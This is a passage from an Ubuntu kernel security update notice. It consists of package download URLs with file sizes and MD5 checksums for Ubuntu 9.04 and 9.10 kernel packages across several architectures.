http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:    46662 d7a61d1e363f9766795132d3325f02c4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:    41352 7d84e783cf7fc4111eaf964395440369\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:    47402 2cd024da2955f7e35fe4519c8df5add5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:    86924 515a3a07357e06f49b2e4384e2af7b8c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:    33578 452adbbc84f5a5218610ddad25eb3ea0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:   525752 1a2c59458472f4a18538df9386396703\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:   125654 8678d7c3409daf24a373b4d11a0d9263\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:    54874 94d4465b06d14b20af5803f2afddf53d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:   301338 64a58b9a7ee5d53c2d1a486fe32deb93\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:  3746292 099947b9ddfb625da14b96bf1b9f59e6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-18-generic_2.6.28-18.59_i386.deb\n      Size/MD5:   673824 c36739d12d66db8de4b6e270b1c91464\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-18-server_2.6.28-18.59_i386.deb\n      Size/MD5:   676398 c7091523d59d0b1cdd4453e12d5983d5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-18-generic_2.6.28-18.59_i386.deb\n      Size/MD5: 24662186 cfa5f52488fb3767debfefaf8940f6b5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-18-server_2.6.28-18.59_i386.deb\n      Size/MD5: 24777004 b524e2b45df5e9d30ebc81717b5c62d7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-18-virtual_2.6.28-18.59_i386.deb\n      Size/MD5: 10250016 09b9af49da34304c1dd280896ce9c0cd\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.28-18.59_i386.deb\n      Size/MD5:   766288 4858bc3941dc0e545195c0b911142a4c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:   218106 f4f03360ad8e2ee23a58b534e8a2c045\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:   174922 fbc6643612c01e91066a87b6ec9c7125\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:    30064 c8e4db00aa9c0c3b75c47c103d87b4c5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:   262814 794c683379e359de14db8806fe984f78\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:  2110070 da3e69dab278584e1abea5ee15d9b47d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:   150230 7fc91b8ad535bfb705ba2cb2fc9ff57d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:   184326 e505e555ac3bd0c33d00a47f7530f78c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:   143584 209207f7e7887594a9d55d17bf1dca76\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:    34576 cafc0f5f2db11f69d10e75815d3e9018\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:     5504 21cfbb5c1aa4c8d82bf3e1412646263f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:    86018 0dc7720bee90887f4ebf5c71cf93d611\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:    47636 fbebe71b83526192c08fd6d797ee8cb1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:     8714 14ed52e8c0a75151dd45acf3cb1ffc34\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:    44692 27502a17d5ca35cc31a9fd79ae7d2f1d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:    14780 2c9ea91e8d8da2bff76c38a6cdce748d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:  1445966 33fa2ee03c566924552fc5b413e2ccf1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:    44098 f740dcb377a692e2ff25a65424431e5b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:    69290 a7e3130530005bf8fe4edabe8b003888\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:   119528 a12c1a5bf9a112402d80e8f77ee87a1c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:    12678 6646096dee2575f3bb33510e70bdd52b\n\n  lpia architecture (Low Power Intel Architecture):\n\n    http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:   215260 9a096eefa7f5e423c60fea41c314b9a5\n    http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:    46664 ba3b534d98d6717395ec66b402b3c701\n    http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:    40958 5950f34ca1fbd16f82a42020bc934ec6\n    http://ports.ubuntu.com/pool/main/l/linux/fb-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:    47312 0d7d48294720bbd387710d560756ce6a\n    http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:    86530 9e5c38cd42496250d5fcf951c6b5d4bd\n    http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:    33272 a8890faa31cf92122bcce2991374fe7e\n    http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:   523810 7b2a58ca4d024926c0f8101ab49242d6\n    http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:   125252 f48299cd45e2ef1a74017d1c7653976e\n    http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:    63568 135fe854fe31d2d8bd9cd09f40a266e5\n    http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:   300756 77668125ff976eaed45f3d2676a46c5f\n    http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:  3035296 186cc64995c4fd4404241de5399eb0fb\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.28-18-lpia_2.6.28-18.59_lpia.deb\n      Size/MD5:   641460 1a4d29b73378acb8bcf88658f88dd08e\n    http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.28-18-lpia_2.6.28-18.59_lpia.deb\n      Size/MD5: 21796372 d7455e818bf972ef7eb0fe54b7bd96dc\n    http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.28-18.59_lpia.deb\n      Size/MD5:   766260 b67d9c1432185123449ed6826ed9588d\n    http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:   303982 80fe6dcf6d68a46047ef6ddc2c098614\n    http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:   157406 2cc8f76d83482452bb6073656a80b2ee\n    http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:    24442 28180da41edae2700e4c8a0e4f1c656f\n    http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:   260414 49a0b6bd418a0ff1d274ce8f602e2733\n    http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:  2027576 241ee9a564502f3d8837806d5e6480d0\n    http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:   149398 b14f79b842c979418dec65e273836cd0\n    http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:   184736 a159624d12831598d35c3b00ba563182\n    http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:   143238 2720ae4f8cdad85066fc888e7fc3c796\n    http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:    34462 582363a3843fdbded2476793775ace76\n    http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:     5496 67c7245d730a7b241eb9947afeef7669\n    http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:    85646 6a31ffe0054c27df1506ae34162ab79e\n    http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:    47402 ff41a000c4a3abbed18330e905a01b7b\n    http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:     8718 15aa2d8fafced6b6e3b5a24c698b4089\n    http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:    63106 7a967940a04c1ee6a9626258e608b54c\n    http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:    14720 dc899d8630769d6270526c49f99a2af8\n    http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:  1447832 400eeba1e83569d777954b21b6df593c\n    http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:    43898 16b0a1310e3f70dccfc8d0d5f971b064\n    http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:   155186 b22b41e37f88fe49531f5580e0f7f712\n    http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:   172666 df244ff125096be469b1c56a30f1e05f\n    http://ports.ubuntu.com/pool/main/l/linux/virtio-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:     8154 f2d765541e008431b4d3eae00f435b61\n\nUpdated packages for Ubuntu 9.10:\n\n  Source archives:\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2_2.6.31-304.10.dsc\n      Size/MD5:     2450 610bb83247876f8a8b47a0fd0d46fae8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2_2.6.31-304.10.tar.gz\n      Size/MD5: 87052080 62b9dcb9ad24e659db1aa085f9e5a456\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-fsl-imx51/linux-fsl-imx51_2.6.31-108.21.dsc\n      Size/MD5:     1906 a39c7ff46fb3ff74480d0e98366a486d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-fsl-imx51/linux-fsl-imx51_2.6.31-108.21.tar.gz\n      Size/MD5: 81902928 c9e88b4f386710c3f22979986a7e3a34\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-mvl-dove/linux-mvl-dove_2.6.31-211.22.dsc\n      Size/MD5:     1943 25176b20de251c2e58bb95e2dd9c1c7b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-mvl-dove/linux-mvl-dove_2.6.31-211.22.tar.gz\n      Size/MD5: 82470873 4d5238d3d11105852133d3eb802a95cc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.31-19.56.diff.gz\n      Size/MD5:  2811600 b2b44f12a786758d470e6a29c09d0388\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.31-19.56.dsc\n      Size/MD5:     3782 ae6bf5844769d00004b919a6f61d588c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.31.orig.tar.gz\n      Size/MD5: 78278595 16c0355d3612806ef87addf7c9f8c9f9\n\n  Architecture independent packages:\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2-doc_2.6.31-304.10_all.deb\n      Size/MD5:  3790328 e35ab5c36ee1bac625d2a57bd19e0c5c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2-source-2.6.31_2.6.31-304.10_all.deb\n      Size/MD5: 64258256 70b947cc9e9012c9472f2c317f11ffae\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-headers-2.6.31-304_2.6.31-304.10_all.deb\n      Size/MD5:  9662096 ac58cebef695901ea01bc7413b79109f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-doc_2.6.31-19.56_all.deb\n      Size/MD5:  3791668 3836f273873fedf9d2293ee0d11df6ce\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-19_2.6.31-19.56_all.deb\n      Size/MD5:  9531414 34d882276f33b0e37135c379a6e1c451\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-source-2.6.31_2.6.31-19.56_all.deb\n      Size/MD5: 62161518 9d3f3f79b9f14db8bd3dc68594eb8c8c\n\n  amd64 architecture (Athlon64, Opteron, EM64T Xeon):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-headers-2.6.31-304-ec2_2.6.31-304.10_amd64.deb\n      Size/MD5:   603212 951db7e930eefc5fff9017c56badfb6e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-image-2.6.31-304-ec2_2.6.31-304.10_amd64.deb\n      Size/MD5: 18660056 e39dda7f87b093e927c34a928b842c7a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:   221398 682a7dab5b571a7b2fd31f19daf724c1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/char-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:    15536 55206db30b20aea4d7da38b342fc095d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:    52128 1cde23d38ba6908e1123951ef4bc3c69\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:    44828 94402e34a45cf232ae86f3cc08bf7f4f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:    50072 65e128949b6f525d9028187fe1e7cc37\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:    92518 338960088cec6b9b25ef2a96e96f3ebc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:    37776 452d9c073d191ec2be1cad3aceb34490\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:   537676 6bb8167794701151c613afe28a5c62c5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:   130666 ff5cf8923b89d0fa4b5c3c4a61ef93f7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:    53846 ffdc544c68e862a0a3038c99ac2d73a3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:   310118 c2092f9a83a4f59145005f2c451d304b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:  4353666 3a04bb875ae70561075d05d5bb208977\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-19-generic_2.6.31-19.56_amd64.deb\n      Size/MD5:   694766 85017cb531a49ea743cb7b30341b5ffa\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-19-server_2.6.31-19.56_amd64.deb\n      Size/MD5:   694938 550a64d6d54ee5f34f1fb9eefbd4cc3e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-19-generic_2.6.31-19.56_amd64.deb\n      Size/MD5: 28924984 3001e6d36f6bf76621997bdbeb864234\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-19-server_2.6.31-19.56_amd64.deb\n      Size/MD5: 28885946 ff6296f4c684dd9facb011fc51b0b6f0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-19-virtual_2.6.31-19.56_amd64.deb\n      Size/MD5: 11740736 287948976d92a7cae832a34ce33a99b1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.31-19.56_amd64.deb\n      Size/MD5:   743052 35cb9d5d80b77a2586d08ffb65d3212a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:   168272 fc4758b6b91802971538d3a3c519056d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:   202768 73cfe4be43d350582d171ff0e178b6b5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:    27268 ae850a5e0ba4381a290b8f21ff88737f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:   311688 3dab8c023e4aad0df74c5193aeaca49b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:  2282064 f09b0e8828effab3770bfc1da159a8f2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:   158666 6765112bf6fed248c08465e47b4dab00\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:   203112 fed91a4bc3d356a5a9bb1c6110337413\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:   161072 faec6563ccef41e925482b36619fca7c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:    38056 505cbeb1fdbf55eea7664a19dcedc11f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:     5762 a3ba57f83594477b27886cb3f4bd1b0d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:    73750 53978367ed22b3daba246878064b72c2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:    22240 8a1036af3dacffb432813cc8422f6ae8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:     9548 f1e71c2129cc33f1ff139401b7b81547\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:    39844 48e4aa79753fdb3ce1877ca1817b9fc6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:    23484 f1be46cb2947ebe6b6d2e5b571d71a35\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:  1389556 2ba51ea53e5454f75c8b39f21481e45d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:    47382 89f1dff9282f3c667cf1b8c2bc41353c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:    51636 41311bd8c8459ba04789539733e6ff5c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:   128972 9697c034ed2bb74b5d18c5ae31fe1af0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:    15814 8f46e8ddd6cac16dbdbc7c89cc94bee0\n\n  i386 architecture (x86 compatible Intel/AMD):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-headers-2.6.31-304-ec2_2.6.31-304.10_i386.deb\n      Size/MD5:   573528 fa913abed6caeb5c33eb2167f730956f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-image-2.6.31-304-ec2_2.6.31-304.10_i386.deb\n      Size/MD5: 17943372 803487f6122441604ec3062e7bb98228\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:   198832 3282a330510666a582f6b8c0269d2f53\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/char-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:    32458 03e2d90ce28677b7956fa2a72726d02e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:    49938 c0d1953d9212f1569f04e8c8ba0db7ca\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:    42118 db5bcc80727cd1013bc8393df2a88e4c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:    45954 2d497ad958e7e7fc1b57ce51ff6b3570\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:    87386 8e3ab58cf14ac0e97a334a65ae3e42ba\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:    33754 bdbf52c3d681cca0ecdced183d2d37c4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:   534176 5f166aa72d31a95df7cdb60abe4a0fc2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:   128172 821c97524ce74e0685b135140c5261d7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:    49748 9423b0562b984b85856d219d7b67fa27\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:   295726 0736ef03d01a5e5e4fdf284ad2be5409\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:  4185460 831a6068ef18d08ff697df14dead1668\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-19-386_2.6.31-19.56_i386.deb\n      Size/MD5:   674832 6c28f2a428900b7c3ecd857dd2363150\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-19-generic-pae_2.6.31-19.56_i386.deb\n      Size/MD5:   674164 daade678beff67e96da61f42286bb8d4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-19-generic_2.6.31-19.56_i386.deb\n      Size/MD5:   674252 0786c96b6d902a71c6f1a2e5aa202345\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-19-386_2.6.31-19.56_i386.deb\n      Size/MD5: 28775482 99e9b99d437aa88ec42e838367ca0c3b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-19-generic-pae_2.6.31-19.56_i386.deb\n      Size/MD5: 28938194 19d1d147a9e9dfb49fcd30b9d065d289\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-19-generic_2.6.31-19.56_i386.deb\n      Size/MD5: 28836780 00047de0d649be8b91c813fe7ee482b7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-19-virtual_2.6.31-19.56_i386.deb\n      Size/MD5: 11193984 1848c77671f6d9129f990e1a0a9940d0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.31-19.56_i386.deb\n      Size/MD5:   743050 af6030dae8f05d7ef583ee7d6f31be8b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:   172774 c11dd36baffeccf283ce48e122d7c791\n    